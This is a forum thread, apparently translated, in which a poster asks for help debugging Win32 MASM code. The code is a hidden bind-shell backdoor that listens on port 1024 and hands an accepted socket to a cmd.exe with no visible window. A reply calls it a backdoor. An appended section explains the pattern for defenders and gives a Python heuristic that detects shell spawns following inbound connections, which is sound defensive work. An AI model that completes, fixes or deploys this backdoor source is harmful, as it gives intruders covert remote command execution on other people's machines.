Author: fengjk2006

[Discussion] How to realize the output of cmd in win32 assembly

Post time: 2020-12-20 21:15:01
Obviously, this type of code is used as a backdoor

The original poster seems to be doing bad things
Author | Post time: 2020-12-21 00:15:02
"Just use pipe. MSDN has the complete source code."

If you use pipes, then the socket can only be a socket. Right now I am using WSASocket, in order to work out the redirected output of cmd...

Call CreateProcess to execute cmd, and assign the handle returned by accept() to hStdInput, hStdOutput and hStdError in the process startup information (STARTUPINFO). In theory this should work, but when I compiled and ran the code, cmd was launched and then disappeared in a flash. I looked at it with OD (OllyDbg) and found no errors when single-stepping through it. I hope to discuss it together. The complete code I wrote is as follows:

```asm
.386P
.model flat,stdcall
option casemap:none
include windows.inc
include user32.inc
include kernel32.inc
include wsock32.inc
include Ws2_32.inc
includelib user32.lib
includelib kernel32.lib
includelib wsock32.lib
includelib Ws2_32.lib
TCP_PORT equ 1024                       ; constant definition
.data
szCommand db 'cmd.exe',0
.data?
hScoket SOCKET ?
hScoketOther SOCKET ?
szBuffer db MAX_PATH dup(?)
dwSize DWORD ?
.code
_ProcessMain proc
    local @wsaData:WSADATA
    local @hScoket:SOCKET
    local @stAddr:sockaddr_in
    local stStartUp:STARTUPINFO
    local stProcInfo:PROCESS_INFORMATION
    invoke WSAStartup, 0202H, addr @wsaData   ; initialize the Winsock library
    mov @stAddr.sin_family,AF_INET           ; set the address family
    invoke htons, TCP_PORT                   ; set the port
    mov @stAddr.sin_port,ax                  ; save it
    mov @stAddr.sin_addr,INADDR_ANY          ; set the IP address
    invoke WSASocket,AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0   ; create the socket
    mov hScoket,eax                          ; save the handle
    invoke bind,hScoket,addr @stAddr,sizeof sockaddr_in         ; bind
    .if eax == SOCKET_ERROR
        mov eax,FALSE
        ret
    .endif
    invoke listen,hScoket,5                  ; start listening, backlog of 5
    invoke accept, hScoket, NULL, NULL       ; block until a client connects
    .if eax != INVALID_SOCKET
        mov hScoketOther,eax
    .endif
    invoke GetStartupInfo,addr stStartUp
    mov ebx,hScoketOther
    mov stStartUp.hStdInput, ebx   ; assign the STARTUPINFO handle members so cmd's standard
                                   ; handles point at the socket returned by accept()
    mov stStartUp.hStdOutput,ebx
    mov stStartUp.hStdError,ebx
    mov stStartUp.dwFlags,STARTF_USESHOWWINDOW or STARTF_USESTDHANDLES
    mov stStartUp.wShowWindow,SW_HIDE
    invoke CreateProcess,NULL,addr szCommand,NULL,NULL,\
        NULL,NORMAL_PRIORITY_CLASS,NULL,NULL,addr stStartUp,addr stProcInfo   ; start cmd
    ret
_ProcessMain endp
start:
    invoke _ProcessMain
    invoke ExitProcess,NULL
end start
```
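From the defender's side, the sequence the code above implements (listen, accept, then CreateProcess of cmd.exe with its standard handles pointed at the accepted socket) is the classic bind-shell pattern that the first reply calls a backdoor, and it leaves a recognisable trace in process and network telemetry: a shell is spawned by a process immediately after that process accepted an inbound connection. The following Python is an added example, not code from the thread, that scores such telemetry. The event schema (dicts with `kind`, `pid`, `ppid`, `image`, `port`, `ts`), the sample events and the 5-second window are all constructed for illustration; real EDR or Sysmon data would need mapping onto these fields.

```python
"""Heuristic detection for the bind-shell pattern discussed in the thread:
a process listens on a TCP port, accept()s a connection and then spawns
cmd.exe whose standard handles are redirected to the accepted socket.

Added example; the event schema below is a constructed stand-in for
whatever endpoint telemetry is actually available.
"""
from collections import defaultdict

# Images whose spawn right after an inbound accept is suspicious.
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# Constructed threshold: seconds between the parent's accept() and the
# shell spawn that we still treat as one action.
ACCEPT_TO_SPAWN_WINDOW = 5.0


def _basename(path):
    """Return the lowercase file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_bind_shell_spawns(events, window=ACCEPT_TO_SPAWN_WINDOW):
    """Return one alert per shell spawn that closely follows an inbound
    accept by the parent process. Events are processed in timestamp order."""
    accepts = defaultdict(list)  # pid -> [(ts, port), ...]
    alerts = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["kind"] == "accept":
            accepts[ev["pid"]].append((ev["ts"], ev["port"]))
        elif ev["kind"] == "process_create" and _basename(ev["image"]) in SHELL_IMAGES:
            # Correlate the child shell with any recent accept() of its parent.
            for ts, port in accepts.get(ev["ppid"], []):
                delay = ev["ts"] - ts
                if 0 <= delay <= window:
                    alerts.append({
                        "child_pid": ev["pid"],
                        "parent_pid": ev["ppid"],
                        "port": port,
                        "delay": round(delay, 3),
                    })
                    break
    return alerts


# Constructed sample telemetry: one bind-shell-like sequence plus benign noise.
SAMPLE_EVENTS = [
    {"kind": "listen", "pid": 4120, "ts": 100.0, "port": 1024},
    {"kind": "accept", "pid": 4120, "ts": 130.2, "port": 1024},
    {"kind": "process_create", "pid": 4188, "ppid": 4120, "ts": 130.5,
     "image": r"C:\Windows\System32\cmd.exe"},
    # Benign: a desktop process launches cmd with no inbound connection.
    {"kind": "process_create", "pid": 5000, "ppid": 2000, "ts": 140.0,
     "image": r"C:\Windows\System32\cmd.exe"},
    # Benign: a server accepts a connection and spawns a non-shell worker.
    {"kind": "accept", "pid": 3000, "ts": 150.0, "port": 8080},
    {"kind": "process_create", "pid": 3001, "ppid": 3000, "ts": 150.1,
     "image": r"C:\app\worker.exe"},
    # Accept long before the shell spawn: outside the window, not flagged.
    {"kind": "accept", "pid": 6000, "ts": 200.0, "port": 2222},
    {"kind": "process_create", "pid": 6001, "ppid": 6000, "ts": 260.0,
     "image": r"C:\Windows\System32\cmd.exe"},
]


if __name__ == "__main__":
    for alert in find_bind_shell_spawns(SAMPLE_EVENTS):
        print("suspicious shell spawn:", alert)
```

The heuristic deliberately keys on the parent's accept() rather than on the child, because a socket handed down through STARTUPINFO is inherited, so connection telemetry is usually attributed to the process that created it, not to cmd.exe. Legitimate remote-administration daemons that accept a connection and then start a shell will also match, so in practice the parent image would be allow-listed or the alert weighted by whether the listening port is one the host is expected to serve.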